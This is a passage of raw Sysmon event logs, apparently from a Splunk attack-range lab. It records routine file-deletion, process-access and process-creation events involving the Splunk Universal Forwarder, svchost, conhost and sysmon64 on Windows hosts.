Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.572{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9013CFF407D3A0C12BEDA793DBFCEF8E,SHA256=A3961C89721B1AE3E011FC00D58906D140FE6887E3AEC46F1C1EC0DBEA3D0141,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:44.259{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC3CF5505A182EAF204498620204D586,SHA256=BBFF37D634192342A3A991849180AAFE13EF32AA406F444BBA1D1F50E45C4CB8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B20-6216-7805-000000003902}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1B20-6216-7805-000000003902}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.212{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B20-6216-7805-000000003902}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.213{4F8D34B0-1B20-6216-7805-000000003902}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:45.572{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B073BAE2EFF3F60A98355DDE65945385,SHA256=CFE5A872240F28C653D8567A4ACBC25E6E60AD423EE10446F8AECE94BEF71D49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:45.275{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A634D53027D1B8F17EF00B5D7BEA291C,SHA256=6C1A101A0C340B0AF51810F75912461C1BAA315188FCD4215CCD80F4FA099D92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:45.213{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD62C83E000DFB35490583D1B9F1237A,SHA256=72059134F67C1AEFF4521C24CEC229E3799C4E94130E788C3DA3797F767C8477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:45.213{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFED72B0F234CF841F17075B2EE4ACB1,SHA256=3537B0BBA101F1614F8928155EAC736D4D3024A391A553546041026D5C1D2C48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.932{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.917{4F8D34B0-1B22-6216-7A05-000000003902}27922892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B22-6216-7A05-000000003902}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 